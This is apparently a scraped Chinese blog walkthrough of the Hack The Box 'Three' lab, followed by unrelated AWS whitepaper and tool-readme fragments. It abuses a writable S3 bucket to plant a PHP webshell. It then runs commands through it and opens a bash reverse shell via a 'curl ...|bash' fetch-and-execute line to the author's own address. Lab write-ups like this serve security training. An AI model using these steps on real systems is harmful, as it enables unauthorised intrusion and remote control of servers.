HTB_Three之aws s3拿shell_htb three_重返太空的博客

link之家

链接快照平台

输入网页链接，自动生成快照
标签化管理网页链接

相关文章推荐

重情义的自行车 · 在AWS ...· 2 周前 ·

坏坏的路灯 · NLP vs. NLU vs. NLG: ...· 1 月前 ·

淡定的铁板烧 · 【政策解读】总局政策法制司负责人就《网络出版 ...· 3 月前 ·

仗义的大蒜 · 第52次《中国互联网络发展状况统计报告》发布 ...· 1 年前 ·

瘦瘦的企鹅 · 程朱理学与阳明心学_良知· 1 年前 ·

寂寞的灯泡 · 比萨_百度百科· 1 年前 ·

没有登录成功，看80端口

是一个乐队的官网， apache2.4.29 、 linux 系统、 php ，功能有搜索，买票，联系我们，不过都只是做个页面，没有实际的请求交互

尝试目录爬取和爆破，没有什么有用的信息…

Email: mail@thetoppers.htb 看到了邮箱，然后把靶机 ip 和域名进行绑定，然后进行子域名爆破，不要问为什么这么做，学着点就行了

子域名爆破，这个问题，因为我们现在只能解析靶机IP和它对应的域名，子域名如何解析？即使是同一个IP的子域名，在没有修改 hosts 文件时也是无法访问的，工具又是如何判断爆破的子域名存在呢？

使用 gobuster 爆破，字典也是从别的工具里借用的，但是字典太大了，就提前结束了

gobuster vhost -w /usr/share/wordlists/domain_dic.txt -u http://thetoppers.htb  
 vhost 的主要功能是枚举某个服务上部署的所有虚拟主机，其原理是通过构造 HTTP 请求头，将字典中的域名设置到 HTTP 请求头到 HOST 字段，然后通过 IP 请求网站，如果是该域名的虚拟主机，那么请求会返回该域名下的网站内容，如果不是，则返回通过 IP 访问获得的资源而非域名下的资源 
这样就解释的通了，接下来同样是修改 hosts 文件 
可以看到返回包的头 
使用的 hypercorn 这是一个 ASGI 服务器，启用后监听8000端口云云，不用了解太多 
 ASGI（异步服务器网关接口）是WSGI的精神继承者，旨在在具有异步功能的Python Web服务器，框架和应用程序之间提供标准接口 
AWS S3 拿shell
 
s3 👉 AWS S3 全名是 Amazon Simple Storage Service ，简便的对象存储服务，存储的数据类似键值对的形式，就是对象名：数据 
apt install awscli       // 安装工具 
aws configure            // 配置
前两项配置是用户凭证，通过什么身份连接到 AWS 存储库，第三个是区域信息，第四个是输出格式，为什么都是 temp 我也不懂，可能是设置的 
通过该工具访问并执行命令 
aws --endpoint=http://s3.thetoppers.htb s3 ls
aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb
还可上传文件，上传一个一句话木马 
aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb
成功获取 webshell 权限 
curl -v http://thetoppers.htb/shell.php?cmd=id
接下来反弹 shell ，创建一个 shell.sh 文件，执行后连接本机 1337 端口 
#!/bin/bash
bash -i >& /dev/tcp/10.10.16.6/1337 0>&1
和之前下载 netcat 一样的步骤，目标主机访问本机 web 服务端口下载脚本执行，连接到 nc 监听的端口 
python 监听 8000 端口 
python3 -m http.server 8000
nc 监听 1337 端口 
nc -lvnp 1337
访问如下连接，请求下载 shell.sh 并执行，别怀疑，就是 |bash ，代表执行该脚本 
http://thetoppers.htb/shell.php?cmd=curl 10.10.16.6:8000/shell.sh|bash
反弹成功，查看 flag （靶机ip已变） 
复出第一篇！累 
thetoppers.htb
/etc/hosts
s3.thetoppers.htb
Amazon S3
awscli
aws configure
aws s3 ls
a980d99281a28d638ac68b9bf9453c2b
				AWS白皮书
The focus of this paper is the operational excellence pillar of the Amazon Web
Services (AWS) Well-Architected Framework. It provides guidance to help you
apply best practices in the design, delivery, and maintenance of AWS environments.
				AWS白皮书
The focus of this paper is the security pillar of the Well-Architected Framework.
It provides guidance to help you apply best practices in the design, delivery, and
maintenance of secure AWS environments.
 需要快速上传并获得文件链接吗？ 这个小的Bash脚本将帮助您做到这一点。
 将自动为文件提供时间戳后缀，以避免命名冲突。 例如， image.png将作为image-1430566517.png上传。
将放在PATH中的某个位置（例如/ usr / local / bin）。 
cp shells3.sh /usr/local/bin/shells3
 将配置文件添加到~/.shells3.conf 。 有关配置选项的描述，请参见 。 
cp shells3.sample.conf ~ /.shells3.conf
vim ~ /.shells3.conf # Edit the configuration in your favourite editor
 上传一个文件
shells3 image.png
兼容性和依赖性
仅在OS X 10.10 Yosemite上进行了
				第0层部分靶机免费，部分靶机收费。由于这部分太过简单，因此一笔带过。
第一关Meow是telnet靶场：https://www.bilibili.com/video/BV1nS4y137GQ
第二关Fawn是ftp靶场：https://www.bilibili.com/video/BV11F41147Kf
第三关Dancing是SMB靶场：https://www.bilibili.com/video/BV1nS4y137vm
第四关Redeemer是Redis靶场：https://www.theethica
				AWS 简介Amazon Web Services 概览（2018 年 12 月）    HTML | PDF
概要介绍所有 AWS 服务。AWS 架构完善的框架（2018 年 11 月）    PDF
概要介绍用于验证您的架构的 AWS 架构完善的框架。AWS 云采用框架概览（2017 年 2 月）    PDF 可帮助您成功采用 AWS 的框架。AWS 安全性最佳实践（2016 年  月）    PDF 关于安全使用 AWS 产品的权威指南。AWS 存储服务概览（2016 年 12 月）    PDF
概要介绍 AWS 提供的存储解决方案。
AWS 定价机制说明（2018 年 6 月）    PDF
关于使用 AWS 简单月度成本结算器估算每月 AWS 使用成本的指南。
				视频介绍：https://www.bilibili.com/video/BV17T4y1i7Uh
官方文档：https://help.hackthebox.com/en/articles/5185158-introduction-to-hack-the-box个人感觉前者偏向实战一些，后者偏向练习题一些。更详细的区别，参见：
https://hacktalk.net/hacking-the-box-htb-vs-vulnhub/过去注册HTB的时候，需要拿到邀请码才行，类似下面视频这种，但是现在你不需要邀请